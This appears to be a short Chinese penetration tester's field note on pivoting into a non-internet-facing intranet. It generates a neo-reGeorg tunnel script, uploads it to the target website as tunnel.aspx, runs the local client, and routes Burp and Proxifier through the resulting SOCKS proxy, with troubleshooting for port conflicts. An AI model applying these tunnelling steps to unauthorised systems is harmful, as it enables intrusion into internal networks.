0x00 前言
在一次项目中,由于目标机器不出网,所以就尝试用neo-reg将流量正向代理出来,但是代理出来后配合burp抓包又出问题了,所以记录一下配置过程
0x01 步骤
1、neo-reg正向代理步骤
第一步:先生成密码为123456的脚本文件
python3 neoreg.py generate -k 123456
第二步:上传对应的脚本文件到目标网站上
第三步:在本地执行如下命令
python3 neoreg.py -k 123456 -u https://xxx.xxx.xxx/2021/0803/tunnel.aspx
2、burp配置
在Project options->SOCK5 Proxy->输入127.0.0.1和1080->勾选use SOCKS proxy
就可以抓包了,在这里有几个坑点
①一定要确保输入的127.0.0.1和1080已经输入进去了,输入完后按回车键
②如果use SOCKS proxy
死活勾不上,我这里的原因是Proxifier
使用了这个端口被占用了,所以即使勾上了,但立马就取消了,一定要确定其他工具没有占用这个端口
测试访问内网http://10.196.128.12:8280
3、Proxifier配置
当我们要使用本地工具对内网进行扫描或者其他操作的时候,就需要用Proxifier了
第一步:添加Proxy Server,这里要选择SOCKS5
第二步:添加Proxification Rule,将对应的工具添加到里面,然后选择刚刚添加的Proxy Server,就可以了